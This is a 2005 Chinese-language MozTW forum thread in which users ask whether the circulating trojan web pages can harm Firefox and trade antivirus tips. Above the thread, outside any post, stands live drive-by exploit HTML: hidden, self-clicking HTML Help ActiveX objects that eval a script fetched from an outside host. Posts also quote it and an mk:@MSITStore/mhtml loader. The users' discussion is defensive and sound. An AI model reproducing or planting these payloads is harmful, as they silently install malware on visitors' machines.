MozTW 討論區 :: 檢視主題 - [問題]最近常見的木馬網頁對火狐有危險嗎

<SCRIPT language=VScript src="bbs003302.gif"></SCRIPT>

<SCRIPT language=VScript src="bbs003302.css"></SCRIPT>

<HTML>

<BODY>

<div style="display:none">

<OBJECT id="cctv" type="application/x-oleobject" classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11">

<PARAM name="Command" value="Related Topics, MENU">

<PARAM name="Window" value="$global_ifl">

<PARAM name="Item1" value='command;file://C:\WINDOWS\Help\apps.chm'>

</OBJECT>

<OBJECT id="zgds" type="application/x-oleobject" classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11">

<PARAM name="Command" value="Related Topics, MENU"><PARAM name="Window" value="$global_ifl">

<PARAM name="Item1" value='command;javascript:eval("document.write(\"<SCRIPT language=JScript src=\\\"http://mir2mir.w3.zccn.net/gbbs003302.gif\\\"\"+String.fromCharCode(62)+\"</SCR\"+\"IPT\"+String.fromCharCode(62))")'>

</OBJECT>

</div>

<SCRIPT>cctv.Click();setTimeout("zgds.Click();",0);</SCRIPT>

</BODY>

</HTML>

發表人:	chilly [ 2005-04-04, 12:51 ]
文章主題 :	[問題]最近常見的木馬網頁對火狐有危險嗎
這類留言的標題都跟最熱門的話題有關留言內附有網址，每一週出現的網址都不一樣但除了當標題的部分不同外，網頁內容都一樣代碼: <script language="javascript" src="ray.js"></script> ray.js內容如下代碼: <HTMLoncontextmenu="returnfalse"><HEAD><TITLE> ﹛</TITLE></HEAD><BODY> <SCRIPTLANGUAGE="JavaScript.Encode"src="icyfox.js"></SCRIPT> <SCRIPTLANGUAGE="JavaScript"> varurl=document.location.href;url=url.substring(0,url.lastIndexOf('/')); document.write('<OBJECTWidth=0Height=0style="display:none;"type="text/x-scriptlet"data="mk:@MSITStore:mhtml:c:\\.mht!'+url+'/icyfox.js::/%23"></OBJECT>'); window.status="﹛"; </SCRIPT> </BODY> <NOSCRIPT><iframestyle="display:none;"src='.'></iframe></NOSCRIPT> </HTML> 開啟後只有很少部分的人會掃到掃到木馬不知道是多數人防毒軟體不夠強還是安全性夠高的IE能擋下木馬其中icyfox.js不管用純文字開或是用FireFox開都是亂碼檔案相當大，不知道是什麼東西 (我可不想用IE去開來玩) 想問問會看語法的前輩這類的語法對FireFox有沒有傷害力？還有遇到以圖檔副檔名為名的網頁，火狐是不會顯示圖片但會下載裡面的東西嗎？最近出現很可疑的圖片，火狐都開不出圖確定該網頁內的確藏有木馬，擔心也會被偷偷侵入到電腦中

發表人:	BobChao [ 2005-04-04, 13:20 ]
文章主題 :
我不是這方面的高手，就自己知道的範圍講一下：如果我沒記錯，只要設定 <object> 為 display:none; 那 firefox 就不會讀入，是以不會執行。實際的情形我是很想去試試看啦不過沒連結 ^^;

發表人:	Carousel [ 2005-04-04, 15:26 ]
文章主題 :	請參考
http://www.oneji.net/bbs/topic.asp?l_id=17&t_id=197

發表人:	kourge [ 2005-04-04, 18:39 ]
文章主題 :
這種木馬其實是大陸網友冰狐浪子所製作的木馬建造範例，卻被人濫用，拿來"危害世人" http://www.icyfoxlovelace.com/

發表人:	firefoxcj [ 2005-04-08, 20:11 ]
文章主題 :	大家帮我看看这是虾米问题啊
Google Error We're sorry... ... but we can't process your request right now. A computer virus or spyware application is sending us automated requests, and it appears that your computer or network has been infected. We'll restore your access as quickly as possible, so try again soon. In the meantime, you might want to run a virus checker or spyware remover to make sure that your computer is free of viruses and other spurious software. We apologize for the inconvenience, and hope we'll see you again on Google. To continue searching, please type the characters you see below: 当我用google进行搜索的时候出现上述文字提示啊城门城门几仗高带著爱情骑白马进城堡

MozTW 討論區 https://forum.moztw.org/

[問題]最近常見的木馬網頁對火狐有危險嗎 https://forum.moztw.org/viewtopic.php?f=2&t=7516	第 1 頁 (共 1 頁)

發表人:	BobChao [ 2005-04-08, 23:55 ]
文章主題 :
firefoxcj 寫: Google Error We're sorry... ... but we can't process your request right now. A computer virus or spyware application is sending us automated requests, and it appears that your computer or network has been infected. We'll restore your access as quickly as possible, so try again soon. In the meantime, you might want to run a virus checker or spyware remover to make sure that your computer is free of viruses and other spurious software. We apologize for the inconvenience, and hope we'll see you again on Google. To continue searching, please type the characters you see below: 当我用google进行搜索的时候出现上述文字提示啊城门城门几仗高带著爱情骑白马进城堡ㄜ他講得很清楚英文字典查一下就行了吧(簡言之：Google 被攻擊了，先暫停一下服務。) 況且這篇跟樓頂的問題有何相干...

發表人:	chilly [ 2005-04-14, 10:23 ]
文章主題 :	又來一種不一樣的
代碼: <SCRIPT language=VScript src="bbs003302.gif"></SCRIPT> <SCRIPT language=VScript src="bbs003302.css"></SCRIPT> <HTML> <BODY> <div style="display:none"> <OBJECT id="cctv" type="application/x-oleobject" classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11"> <PARAM name="Command" value="Related Topics, MENU"> <PARAM name="Window" value="$global_ifl"> <PARAM name="Item1" value='command;file://C:\WINDOWS\Help\apps.chm'> </OBJECT> <OBJECT id="zgds" type="application/x-oleobject" classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11"> <PARAM name="Command" value="Related Topics, MENU"><PARAM name="Window" value="$global_ifl"> <PARAM name="Item1" value='command;javascript:eval("document.write(\"<SCRIPT language=JScript src=\\\"http://mir2mir.w3.zccn.net/gbbs003302.gif\\\"\"+String.fromCharCode(62)+\"</SCR\"+\"IPT\"+String.fromCharCode(62))")'> </OBJECT> </div> <SCRIPT>cctv.Click();setTimeout("zgds.Click();",0);</SCRIPT> </BODY> </HTML> 毫無疑問，用火狐是開不出東西但這語法很複雜，讓人還是會擔心在眼睛看不到的地方會出事該網頁已認定是有問題，因為不斷出現在家族標題總是很好聽，但沒穿衣服的林志玲卻會跟防毒軟體是同一個檔案......看了就覺得可疑

發表人:	bud [ 2005-04-17, 13:53 ]
文章主題 :
下面的軟體都很好用: Ad-Aware SE Personal Edition - 免費清除後門程式軟體免費瀏覽器防間諜程式軟體 - SpywareBlaster v3.3 Spybot - Search & Destroy v1.4 RC1 個人使用免費防毒軟體 AntiVir Personal Edition 其中 Spybot - Search & Destroy v1.4 RC1 可在此下載: http://www.slime9.com.tw/d-28.htm AntiVir Personal Edition 可在此下載: http://www.free-av.com/ http://free.tnc.edu.tw/modules/news/art ... oryid=1833 我覺得SpywareBlaster應該可以替Firefox 1.0.3擋下很多惡意網頁吧！

第 1 頁 (共 1 頁)	所有顯示的時間為 UTC + 8 小時
Powered by phpBB® Forum Software © phpBB Group https://www.phpbb.com/